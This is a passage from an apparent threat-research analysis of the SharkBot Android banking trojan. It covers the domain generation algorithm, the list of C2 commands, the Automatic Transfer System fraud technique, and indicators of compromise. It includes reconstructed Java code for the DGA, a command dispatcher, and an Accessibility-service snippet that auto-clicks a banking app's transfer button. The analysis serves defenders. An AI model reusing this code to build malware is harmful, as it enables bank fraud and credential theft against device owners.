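    private static final String SUFFIX = "pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf";
    // Illustrative TLD list; the real sample carries its own list
    private static final String[] TLDS = {".xyz", ".click", ".top"};

    public static List<String> candidates() {
        Calendar cal = Calendar.getInstance();
        // '+' on two int values sums them instead of concatenating,
        // e.g. week 2 of 2022 -> 2 + 2022 = 2024
        int sum = cal.get(Calendar.WEEK_OF_YEAR) + cal.get(Calendar.YEAR);
        String encoded = Base64.getEncoder().encodeToString((sum + SUFFIX).getBytes());
        // First 19 characters form the domain label; the real sample
        // presumably also normalizes characters invalid in hostnames
        String label = encoded.substring(0, 19).toLowerCase(Locale.ROOT);
        List<String> domains = new ArrayList<>();
        for (String tld : TLDS) {
            domains.add(label + tld);
        }
        return domains;
    }
}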

In previous versions of SharkBot (from November-December 2021), it only used the current week of the year to generate the domain. Adding the year to the generation algorithm seems to be an update for better support of the new year, 2022.

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions on the infected device, such as sending text messages, downloading files, or showing injections. The list of commands it can receive and execute is as follows (a hypothetical dispatcher sketch follows the list):

  • smsSend: used to send a text message to the phone number specified by the TAs
  • updateLib: used to request that the malware download a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which SharkBot uses to save its configuration (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in-progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check whether the permission to ignore battery optimizations is granted, and to show the Android settings to disable battery optimization if it is not
  • sendInject: used to show an overlay to steal the user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With this permission enabled, SharkBot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so that every time the user tries to open that app, the Accessibility Service will close it
  • downloadFile: used to download a file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)
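As referenced above, the following is a hypothetical Java sketch of how such a command handler might be structured. The JSON field names (‘command’, ‘url’, etc.) and the helper method stubs are assumptions, since the real handler is obfuscated; only the command names come from the sample:

import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;

public class CommandDispatcher {
    public void dispatch(JSONObject cmd) throws JSONException {
        switch (cmd.getString("command")) {
            case "smsSend":      sendSms(cmd.getString("number"), cmd.getString("text")); break;
            case "downloadFile": downloadFile(cmd.getString("url")); break;
            case "sendInject":   showInjection(cmd.getString("app")); break;
            case "localATS":     runAts(cmd.getJSONArray("events")); break;
            // ... the remaining commands (updateLib, updateSQL, stopAll, etc.)
            default: break;
        }
    }

    private void sendSms(String number, String text) { /* SmsManager.sendTextMessage(...) */ }
    private void downloadFile(String url)            { /* fetch and store the file */ }
    private void showInjection(String targetApp)     { /* display the overlay for targetApp */ }
    private void runAts(JSONArray events)            { /* replay the Accessibility events */ }
}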

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by Android banking malware.

To summarize, ATS can be compared with webinjects, only serving a different purpose. Rather than gathering credentials for use/sale, it uses the credentials to automatically initiate wire transfers on the endpoint itself (thus without needing to log in separately, bypassing 2FA and other anti-fraud measures). However, it is very individually tailored and requires quite some maintenance for each bank, amount, money mule, etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app, the malware receives an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in a specific order. Those events are used to simulate the victim’s interaction with the banking app to make money transfers, as if the user were making the transfer themselves.

This way, the money transfer is made from the victim’s own device by simulating different events, which makes the fraud much more difficult for fraud detection systems to detect.
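A minimal Java sketch of the core mechanism, assuming hypothetical names (AtsService, com.example.bank, the ‘Transfer’ button label) and a single hardcoded step instead of the C2-supplied JSON event array:

import android.accessibilityservice.AccessibilityService;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;

public class AtsService extends AccessibilityService {
    // One step of an ATS script: click the on-screen element matching 'label'
    private void clickByText(String label) {
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        for (AccessibilityNodeInfo node : root.findAccessibilityNodeInfosByText(label)) {
            node.performAction(AccessibilityNodeInfo.ACTION_CLICK);
        }
    }

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // A real sample would walk through the C2-supplied JSON array of
        // events ('localATS' command); a single hardcoded step is shown here
        if (event.getPackageName() != null
                && "com.example.bank".contentEquals(event.getPackageName())) {
            clickByText("Transfer"); // hypothetical button label
        }
    }

    @Override
    public void onInterrupt() {}
}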

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)
  • 20e8688726e843e9119b33be88ef642cb646f1163dce4109b8b8a2c792b5f9fc (Google Play SharkBot dropper)
  • 187b9f5de09d82d2afbad9e139600617685095c26c4304aaf67a440338e0a9b6 (Google Play SharkBot dropper)
  • e5b96e80935ca83bbe895f6239eabca1337dc575a066bb6ae2b56faacd29dd (Google Play SharkBot dropper)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB